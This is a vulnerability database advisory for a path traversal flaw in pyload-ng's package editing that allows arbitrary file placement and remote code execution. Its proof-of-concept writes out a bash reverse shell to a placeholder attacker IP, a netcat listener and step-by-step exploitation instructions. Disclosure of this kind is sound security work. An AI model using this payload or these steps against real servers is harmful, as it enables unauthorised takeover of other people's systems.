logo

Database

Lack of data validation - Path Traversal In pyload-ng

Description

Download to arbitrary folder can lead to RCE

Summary

A web UI user can store files anywhere on the pyLoad server and gain command execution by abusing scripts.

Details

When a user creates a new package, a subdirectory is created within the /downloads folder to store files. This new directory name is derived from the package name, except a filter is applied to make sure it can't traverse directories and stays within /downloads.

src/pyload/core/api/init.py::add_package::L432

  folder = (
      folder.replace("http://", "")
      .replace("https://", "")
      .replace(":", "")
      .replace("/", "_")
      .replace("\\", "_")
  )

So if a package were created with the name "../" the application would instead create the folder "/downloads/.._/"

However, when editing packages there is no prevention in place and a user can just pick any arbitrary directory in the filesystem.

src/pyload/webui/app/blueprints/json_blueprint.py::edit_package::L195

  id = int(flask.request.form["pack_id"])
  data = {
      "name": flask.request.form["pack_name"],
      "_folder": flask.request.form["pack_folder"],
      "password": flask.request.form["pack_pws"],
  }

  api.set_package_data(id, data)...

Steps to reproduce

    Login to a pyLoad instance

    Go to "Queue" and create a new package with any name and a valid link

    Click "Edit Package" on the newly created package and set the folder as "/config/scripts/download_finished/"

    Restart the package

    Check the server filesystem and note the link was downloaded and stored inside "/config/scripts/download_finished/"

Remote code execution proof-of-concept

It is possible to use this issue to abuse scripts and gain remote control over the pyLoad server.

On attacker machine

    Start a web server hosting a malicious script

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attacker_ip>/9999 0>&1' > evil.sh&1
sudo python3 -m http.server 80

    Start netcat listener for reverse shells

nc -vklp 9999

On pyLoad

    Change pyLoad file permission settings

    Change permissions of downloads: On Permission mode for downloaded files: 0744

    Create a package with link pointing to the attacker

    http://<attacker_ip>/evil.sh

    Edit package and change folder to /config/scripts/package_deleted/

    Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad

    Delete any package package to trigger the script

Impact

An authenticated user can gain control over the underlying pyLoad server.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2023-478902. NVD-2023-478903. OSV-2023-478904. GHSA-h73m-pcfw-25h25. GCVE-2023-47890

References

1. https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h22. https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f3. http://pyload.com

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.